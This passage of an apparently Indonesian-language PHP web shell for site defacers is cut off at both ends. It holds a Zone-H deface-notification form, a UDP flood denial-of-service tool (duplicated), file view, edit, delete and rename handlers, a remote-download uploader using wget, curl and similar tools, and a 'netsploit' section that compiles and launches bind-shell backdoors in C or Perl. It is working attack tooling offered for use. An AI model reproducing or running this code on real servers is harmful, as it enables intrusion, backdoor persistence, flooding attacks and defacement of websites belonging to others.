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%3D" style="width: 261px; height: 67px;" /></p>
  2791. <center><span style="font-size:1.6em;"> .: Notifier :. </span></center><center><form action="" method="post"><input class="inputz" type="text" name="defacer" size="67" value="Newbie3viLc063s" /><br> <select class="inputz" name="hackmode">
  2792. <option>------------------------------------SELECT-------------------------------------</option>
  2793. <option style="background-color: rgb(0, 0, 0);" value="1">known vulnerability (i.e. unpatched system)</option>
  2794. <option style="background-color: rgb(0, 0, 0);" value="2" >undisclosed (new) vulnerability</option>
  2795. <option style="background-color: rgb(0, 0, 0);" value="3" >configuration / admin. mistake</option>
  2796. <option style="background-color: rgb(0, 0, 0);" value="4" >brute force attack</option>
  2797. <option style="background-color: rgb(0, 0, 0);" value="5" >social engineering</option>
  2798. <option style="background-color: rgb(0, 0, 0);" value="6" >Web Server intrusion</option>
  2799. <option style="background-color: rgb(0, 0, 0);" value="7" >Web Server external module intrusion</option>
  2800. <option style="background-color: rgb(0, 0, 0);" value="8" >Mail Server intrusion</option>
  2801. <option style="background-color: rgb(0, 0, 0);" value="9" >FTP Server intrusion</option>
  2802. <option style="background-color: rgb(0, 0, 0);" value="10" >SSH Server intrusion</option>
  2803. <option style="background-color: rgb(0, 0, 0);" value="11" >Telnet Server intrusion</option>
  2804. <option style="background-color: rgb(0, 0, 0);" value="12" >RPC Server intrusion</option>
  2805. <option style="background-color: rgb(0, 0, 0);" value="13" >Shares misconfiguration</option>
  2806. <option style="background-color: rgb(0, 0, 0);" value="14" >Other Server intrusion</option>
  2807. <option style="background-color: rgb(0, 0, 0);" value="15" >SQL Injection</option>
  2808. <option style="background-color: rgb(0, 0, 0);" value="16" >URL Poisoning</option>
  2809. <option style="background-color: rgb(0, 0, 0);" value="17" >File Inclusion</option>
  2810. <option style="background-color: rgb(0, 0, 0);" value="18" >Other Web Application bug</option>
  2811. <option style="background-color: rgb(0, 0, 0);" value="19" >Remote administrative panel access bruteforcing</option>
  2812. <option style="background-color: rgb(0, 0, 0);" value="20" >Remote administrative panel access password guessing</option>
  2813. <option style="background-color: rgb(0, 0, 0);" value="21" >Remote administrative panel access social engineering</option>
  2814. <option style="background-color: rgb(0, 0, 0);" value="22" >Attack against administrator(password stealing/sniffing)</option>
  2815. <option style="background-color: rgb(0, 0, 0);" value="23" >Access credentials through Man In the Middle attack</option>
  2816. <option style="background-color: rgb(0, 0, 0);" value="24" >Remote service password guessing</option>
  2817. <option style="background-color: rgb(0, 0, 0);" value="25" >Remote service password bruteforce</option>
  2818. <option style="background-color: rgb(0, 0, 0);" value="26" >Rerouting after attacking the Firewall</option>
  2819. <option style="background-color: rgb(0, 0, 0);" value="27" >Rerouting after attacking the Router</option>
  2820. <option style="background-color: rgb(0, 0, 0);" value="28" >DNS attack through social engineering</option>
  2821.  
  2822. <option style="background-color: rgb(0, 0, 0);" value="29" >DNS attack through cache poisoning</option>
  2823. <option style="background-color: rgb(0, 0, 0);" value="30" >Not available</option>
  2824. option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
  2825. </select> <br>
  2826.  
  2827. <select class="inputz" name="reason">
  2828. <option >------------------------------------SELECT-------------------------------------</option>
  2829. <option style="background-color: rgb(0, 0, 0);" value="1" >Heh...just for fun!</option>
  2830. <option style="background-color: rgb(0, 0, 0);" value="2" >Revenge against that website</option>
  2831. <option style="background-color: rgb(0, 0, 0);" value="3" >Political reasons</option>
  2832. <option style="background-color: rgb(0, 0, 0);" value="4" >As a challenge</option>
  2833. <option style="background-color: rgb(0, 0, 0);" value="5" >I just want to be the best defacer</option>
  2834. <option style="background-color: rgb(0, 0, 0);" value="6" >Patriotism</option>
  2835. <option style="background-color: rgb(0, 0, 0);" value="7" >Not available</option>
  2836. option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
  2837. </select> <br>
  2838. <textarea class="inputz" name="domain" cols="90" rows="20">List Of Domains, 20 Rows.</textarea><br>
  2839. <input class="inputz" type="submit" value=" Send Now !! " name="SendNowToZoneH"/>
  2840. </form>'; ?>
  2841. <?
  2842.     echo "</form></center>";?>
  2843. <?
  2844. function ZoneH($url, $hacker, $hackmode,$reson, $site )
  2845. {
  2846.     $k = curl_init();
  2847.     curl_setopt($k, CURLOPT_URL, $url);
  2848.     curl_setopt($k,CURLOPT_POST,true);
  2849.     curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
  2850.     curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
  2851.     curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
  2852.     $kubra = curl_exec($k);
  2853.     curl_close($k);
  2854.     return $kubra;
  2855. }
  2856. {
  2857.                 ob_start();
  2858.                 $sub = @get_loaded_extensions();
  2859.                 if(!in_array("curl", $sub))
  2860.                 {
  2861.                     die('<center><b>[-] Curl Is Not Supported !![-]</b></center>');
  2862.                 }
  2863.              
  2864.                 $hacker = $_POST['defacer'];
  2865.                 $method = $_POST['hackmode'];
  2866.                 $neden = $_POST['reason'];
  2867.                 $site = $_POST['domain'];
  2868.                  
  2869.                 if (empty($hacker))
  2870.                 {
  2871.                     die ("<center><b>[+] YOU MUST FILL THE ATTACKER NAME [+]</b></center>");
  2872.                 }
  2873.                 elseif($method == "--------SELECT--------")  
  2874.                 {
  2875.                     die("<center><b>[+] YOU MUST SELECT THE METHOD [+]</b></center>");
  2876.                 }
  2877.                 elseif($neden == "--------SELECT--------")  
  2878.                 {
  2879.                     die("<center><b>[+] YOU MUST SELECT THE REASON [+]</b></center>");
  2880.                 }
  2881.                 elseif(empty($site))  
  2882.                 {
  2883.                     die("<center><b>[+] YOU MUST INTER THE SITES LIST [+]</b></center>");
  2884.                 }
  2885.                 $i = 0;
  2886.                 $sites = explode("\n", $site);
  2887.                 while($i < count($sites))  
  2888.                 {
  2889.                     if(substr($sites[$i], 0, 4) != "http")  
  2890.                     {
  2891.                         $sites[$i] = "http://".$sites[$i];
  2892.                     }
  2893.                     ZoneH("http://www.zone-h.com/notify/single", $hacker, $method, $neden, $sites[$i]);
  2894.                     echo "Domain : ".$sites[$i]." Defaced Last Years !";
  2895.                     ++$i;
  2896.                 }
  2897.                 echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]";
  2898.             }
  2899. ?>
  2900. <?php }
  2901.  
  2902. elseif(isset($_GET['x']) && ($_GET['x'] == 'dos'))
  2903.     {  
  2904.     ?>
  2905.     <form action="?y=<?php echo $pwd; ?>&amp;x=dos" method="post">
  2906.     <?php
  2907.    
  2908.     //UDP
  2909.     if(isset($_GET['host'])&&isset($_GET['time']))
  2910.         {
  2911.         $packets = 0;
  2912.         ignore_user_abort(TRUE);
  2913.         set_time_limit(0);
  2914.        
  2915.         $exec_time = $_GET['time'];
  2916.        
  2917.         $time = time();
  2918.         //print "Started: ".time('d-m-y h:i:s')."<br>";
  2919.         $max_time = $time+$exec_time;
  2920.        
  2921.         $host = $_GET['host'];
  2922.        
  2923.         for($i=0;$i<65000;$i++){
  2924.             $out .= 'X';
  2925.         }
  2926.        
  2927.         while(1){
  2928.             $packets++;
  2929.             if(time() > $max_time){ break; }
  2930.             $rand = rand(1,65000);
  2931.             $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
  2932.             if($fp){
  2933.                 fwrite($fp, $out);
  2934.                 fclose($fp);
  2935.             }
  2936.         }
  2937.    
  2938.         echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
  2939.         echo '<br><br>
  2940.         <form action="'.$surl.'" method=GET>
  2941.             <input type="hidden" name="act" value="phptools">
  2942.             Host: <br><input type=text name=host><br>
  2943.             Length (seconds): <br><input type=text name=time><br>
  2944.             <input type=submit value=Go>
  2945.         </form>';
  2946.         }
  2947.     else
  2948.         {
  2949.         echo '<center><form action=? method=GET><input type="hidden" name="act" value="phptools">
  2950.             <table class="tabnet" style="width:300px;">
  2951.                 <tr>
  2952.                     <th colspan="2">UDP Flood</th>
  2953.                 </tr>
  2954.                 <tr>
  2955.                     <td>&nbsp;&nbsp;Host</td>
  2956.                     <td><input style="width:220px;" class="inputz" type=text name=host value=></td>
  2957.                 </tr>
  2958.                 <tr>
  2959.                     <td>&nbsp;&nbsp;Length (seconds)</td>
  2960.                     <td><input style="width:220px;" class="inputz" type=text name=time value=></td>
  2961.                 </tr>
  2962.                 <tr>
  2963.                     <td colspan=2 align=center><input style="width:100%;" class="inputzbut" type="submit" value="Attack !" /></td>
  2964.                 </tr>
  2965.             </table>
  2966.               </center>';
  2967.         }
  2968.     }
  2969.  
  2970. elseif(isset($_GET['x']) && ($_GET['x'] == 'dos'))
  2971.     {  
  2972.     ?>
  2973.     <form action="?y=<?php echo $pwd; ?>&amp;x=dos" method="post">
  2974.     <?php
  2975.    
  2976.     //UDP
  2977.     if(isset($_GET['host'])&&isset($_GET['time']))
  2978.         {
  2979.         $packets = 0;
  2980.         ignore_user_abort(TRUE);
  2981.         set_time_limit(0);
  2982.        
  2983.         $exec_time = $_GET['time'];
  2984.        
  2985.         $time = time();
  2986.         //print "Started: ".time('d-m-y h:i:s')."<br>";
  2987.         $max_time = $time+$exec_time;
  2988.        
  2989.         $host = $_GET['host'];
  2990.        
  2991.         for($i=0;$i<65000;$i++){
  2992.             $out .= 'X';
  2993.         }
  2994.        
  2995.         while(1){
  2996.             $packets++;
  2997.             if(time() > $max_time){ break; }
  2998.             $rand = rand(1,65000);
  2999.             $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
  3000.             if($fp){
  3001.                 fwrite($fp, $out);
  3002.                 fclose($fp);
  3003.             }
  3004.         }
  3005.    
  3006.         echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
  3007.         echo '<br><br>
  3008.         <form action="'.$surl.'" method=GET>
  3009.             <input type="hidden" name="act" value="phptools">
  3010.             Host: <br><input type=text name=host><br>
  3011.             Length (seconds): <br><input type=text name=time><br>
  3012.             <input type=submit value=Go>
  3013.         </form>';
  3014.         }
  3015.     else
  3016.         {
  3017.         echo '<center><form action=? method=GET><input type="hidden" name="act" value="phptools">
  3018.             <table class="tabnet" style="width:300px;">
  3019.                 <tr>
  3020.                     <th colspan="2">UDP Flood</th>
  3021.                 </tr>
  3022.                 <tr>
  3023.                     <td>&nbsp;&nbsp;Host</td>
  3024.                     <td><input style="width:220px;" class="inputz" type=text name=host value=></td>
  3025.                 </tr>
  3026.                 <tr>
  3027.                     <td>&nbsp;&nbsp;Length (seconds)</td>
  3028.                     <td><input style="width:220px;" class="inputz" type=text name=time value=></td>
  3029.                 </tr>
  3030.                 <tr>
  3031.                     <td><input style="width:100%;" class="inputzbut" type="submit" value="Go" /></td>
  3032.                 </tr>
  3033.             </table>
  3034.               </center>';
  3035.         }
  3036.     }
  3037.  
  3038.  
  3039. elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo'))
  3040.     {
  3041.     @ob_start();
  3042.     @eval("phpinfo();");
  3043.     $buff = @ob_get_contents();
  3044.     @ob_end_clean();
  3045.     $awal = strpos($buff,"<body>")+6;
  3046.     $akhir = strpos($buff,"</body>");
  3047.     echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>";
  3048.     }
  3049.  
  3050. elseif(isset($_GET['view']) && ($_GET['view'] != ""))
  3051.     {
  3052.     if(is_file($_GET['view']))
  3053.         {
  3054.         if(!isset($file)) $file = magicboom($_GET['view']);
  3055.         if(!$win && $posix)
  3056.             {
  3057.             $name=@posix_getpwuid(@fileowner($file));
  3058.             $group=@posix_getgrgid(@filegroup($file));
  3059.             $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  3060.             }
  3061.         else { $owner = $user; }
  3062.         $filn = basename($file);
  3063.         echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
  3064.             <tr>
  3065.                 <td>Filename</td>
  3066.                 <td>
  3067.                     <span id=\"".clearspace($filn)."_link\">".$file."</span>
  3068.                     <form action=\"?y=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  3069.                         <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
  3070.                         <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
  3071.                         <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  3072.                         <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  3073.                             onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
  3074.                     </form>
  3075.                 </td>
  3076.             </tr>
  3077.             <tr>
  3078.                 <td>Size</td>
  3079.                 <td>".ukuran($file)."</td>
  3080.             </tr>
  3081.             <tr>
  3082.                 <td>Permission</td>
  3083.                 <td>".get_perms($file)."</td>
  3084.             </tr>
  3085.             <tr>
  3086.                 <td>Owner</td>
  3087.                 <td>".$owner."</td>
  3088.             </tr>
  3089.             <tr>
  3090.                 <td>Create time</td>
  3091.                 <td>".date("d-M-Y H:i",@filectime($file))."</td>
  3092.             </tr>
  3093.             <tr>
  3094.                 <td>Last modified</td>
  3095.                 <td>".date("d-M-Y H:i",@filemtime($file))."</td>
  3096.             </tr>
  3097.             <tr>
  3098.                 <td>Last accessed</td>
  3099.                 <td>".date("d-M-Y H:i",@fileatime($file))."</td>
  3100.             </tr>
  3101.             <tr>
  3102.                 <td>Actions</td>
  3103.                 <td><a href=\"?y=$pwd&amp;edit=$file\">edit</a>
  3104.                     | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a>
  3105.                     | <a href=\"?y=$pwd&amp;delete=$file\">delete</a>
  3106.                     | <a href=\"?y=$pwd&amp;dl=$file\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">gz</a>)
  3107.                 </td>
  3108.             </tr>
  3109.             <tr>
  3110.                 <td>View</td>
  3111.                 <td><a href=\"?y=".$pwd."&amp;view=".$file."\">text</a>
  3112.                     | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=image\">img</a>
  3113.                 </td>
  3114.             </tr>
  3115.         </table> ";
  3116.         if(isset($_GET['type']) && ($_GET['type']=='image'))
  3117.             { echo "<div style:\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&amp;img=".$filn."\"></div>"; }
  3118.         else    { echo "<div class=\"viewfile\">";
  3119.                if(image_ext($file)) { echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&amp;img=".$filn."\"></div>"; } else {
  3120.                            $file = wordwrap(file_get_contents($file),160,"\n",true);
  3121.                            $buff = highlight_string($file,true);
  3122.                            $old = array("0000BB","000000","FF8000","DD0000", "007700");
  3123.                            $new = array("4C83AF","888888", "87DF45", "EEEEEE" , "FF8000");
  3124.                            $buff = str_ireplace($old,$new, $buff);
  3125.                            echo $buff;
  3126.                            echo "</div>";
  3127.                            }
  3128.                         }
  3129.         }
  3130.     elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); }
  3131.     }
  3132.  
  3133. elseif(isset($_GET['edit']) && ($_GET['edit'] != ""))
  3134.     {
  3135.     if(isset($_POST['save']))
  3136.         {
  3137.         $file = $_POST['saveas'];
  3138.         $content = $_POST['content'];
  3139.         if($filez = @fopen($file,"w"))
  3140.             {
  3141.             $time = date("d-M-Y H:i",time());
  3142.             if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time;
  3143.             else $msg = "failed to save"; @fclose($filez);
  3144.             }
  3145.         else $msg = "permission denied";
  3146.         }
  3147.     if(!isset($file)) $file = $_GET['edit'];
  3148.     if($filez = @fopen($file,"r"))
  3149.         {
  3150.         $content = "";
  3151.         while(!feof($filez))
  3152.             {
  3153.             $content .= htmlentities(fgets($filez));
  3154.             }
  3155.         @fclose($filez);
  3156.         } ?>
  3157.     <form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post">
  3158.         <table class="cmdbox">
  3159.             <tr>
  3160.                 <td colspan="2">
  3161.                 <textarea class="output" name="content"><?php echo $content; ?></textarea>
  3162.                 </td>
  3163.             <tr>
  3164.                 <td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" />
  3165.                 <input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> &nbsp;<?php echo $msg; ?>
  3166.                 </td>
  3167.             </tr>
  3168.         </table>
  3169.     </form>
  3170. <?php
  3171.     }
  3172.  
  3173. elseif(isset($_GET['x']) && ($_GET['x'] == 'upload'))
  3174.     {
  3175.     if(isset($_POST['uploadcomp']))
  3176.         {
  3177.         if(is_uploaded_file($_FILES['file']['tmp_name']))
  3178.             {
  3179.             $path = magicboom($_POST['path']);
  3180.             $fname = $_FILES['file']['name'];
  3181.             $tmp_name = $_FILES['file']['tmp_name'];
  3182.             $pindah = $path.$fname;
  3183.             $stat = @move_uploaded_file($tmp_name,$pindah);
  3184.             if ($stat) { $msg = "file uploaded to $pindah"; }
  3185.             else $msg = "failed to upload $fname";
  3186.             }
  3187.         else $msg = "failed to upload $fname";
  3188.         }
  3189.     elseif(isset($_POST['uploadurl']))
  3190.         {
  3191.         $pilihan = trim($_POST['pilihan']);
  3192.         $wurl = trim($_POST['wurl']);
  3193.         $path = magicboom($_POST['path']);
  3194.         $namafile = download($pilihan,$wurl);
  3195.         $pindah = $path.$namafile;
  3196.         if(is_file($pindah)) { $msg = "file uploaded to DIR $pindah"; }
  3197.         else $msg = "failed ! to upload $namafile"; }
  3198.     ?>
  3199.     <form action="?y=<?php echo $pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post">
  3200.         <table class="tabnet" style="width:320px;padding:0 1px;">
  3201.             <tr>
  3202.                 <th colspan="2">Upload from computer</th>
  3203.             </tr>
  3204.             <tr>
  3205.            
  3206.                 <td colspan="2">
  3207.                     <p style="text-align:center;">
  3208.                     <input style="color:#7CDA89;" type="file" name="file" />
  3209.                     <input type="submit" name="uploadcomp" class="inputzbut" value="Go !" style="width:80px;">
  3210.                     </p>
  3211.                 </td>
  3212.             </tr>
  3213.             <tr>
  3214.                 <td colspan="2">
  3215.                     <input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" />
  3216.                 </td>
  3217.             </tr>
  3218.         </table>
  3219.     </form>
  3220.     <table class="tabnet" style="width:320px;padding:0 1px;">
  3221.         <tr>
  3222.             <th colspan="2">Upload from url</th>
  3223.         </tr>
  3224.         <tr>
  3225.             <td colspan="2">
  3226.                 <form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&amp;x=upload">
  3227.                     <table>
  3228.                         <tr>
  3229.                             <td>url</td>
  3230.                             <td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td>
  3231.                         </tr>
  3232.                         <tr>
  3233.                             <td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td>
  3234.                         </tr>
  3235.                         <tr>
  3236.                             <td>
  3237.                             <select size="1" class="inputz" name="pilihan">
  3238.                                 <option value="wwget">wget</option>
  3239.                                 <option value="wlynx">lynx</option>
  3240.                                 <option value="wfread">fread</option>
  3241.                                 <option value="wfetch">fetch</option>
  3242.                                 <option value="wlinks">links</option>
  3243.                                 <option value="wget">GET</option>
  3244.                                 <option value="wcurl">curl</option>
  3245.                             </select>
  3246.                             </td>
  3247.                             <td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go !" style="width:246px;"></td>
  3248.                         </tr>
  3249.                     </table>
  3250.                 </form>
  3251.             </td>
  3252.         </tr>
  3253.     </table>
  3254.     <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
  3255. <?php }
  3256.  
  3257. elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit'))
  3258.     {
  3259.     if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C'))
  3260.         {  
  3261.         $port = trim($_POST['port']);
  3262.         $passwrd = trim($_POST['bind_pass']);
  3263.         tulis("bdc.c",$port_bind_bd_c);
  3264.         exe("gcc -o bdc bdc.c");
  3265.         exe("chmod 777 bdc");
  3266.         @unlink("bdc.c");
  3267.         exe("./bdc ".$port." ".$passwrd." &");
  3268.         $scan = exe("ps aux");
  3269.         if(eregi("./bdc $por",$scan))
  3270.             {
  3271.             $msg = "<p>Process found running, backdoor setup successfully.</p>";
  3272.             }
  3273.         else
  3274.             {
  3275.             $msg = "<p>Process not found running, backdoor not setup successfully.</p>";
  3276.             }
  3277.         }
  3278.     elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl'))
  3279.         {
  3280.         $port = trim($_POST['port']);
  3281.         $passwrd = trim($_POST['bind_pass']);
  3282.         tulis("bdp",$port_bind_bd_pl);
  3283.         exe("chmod 777 bdp");
  3284.         $p2=which("perl");
  3285.         exe($p2." bdp ".$port." &");
  3286.         $scan = exe("ps aux");
  3287.         if(eregi("$p2 bdp $port",$scan))
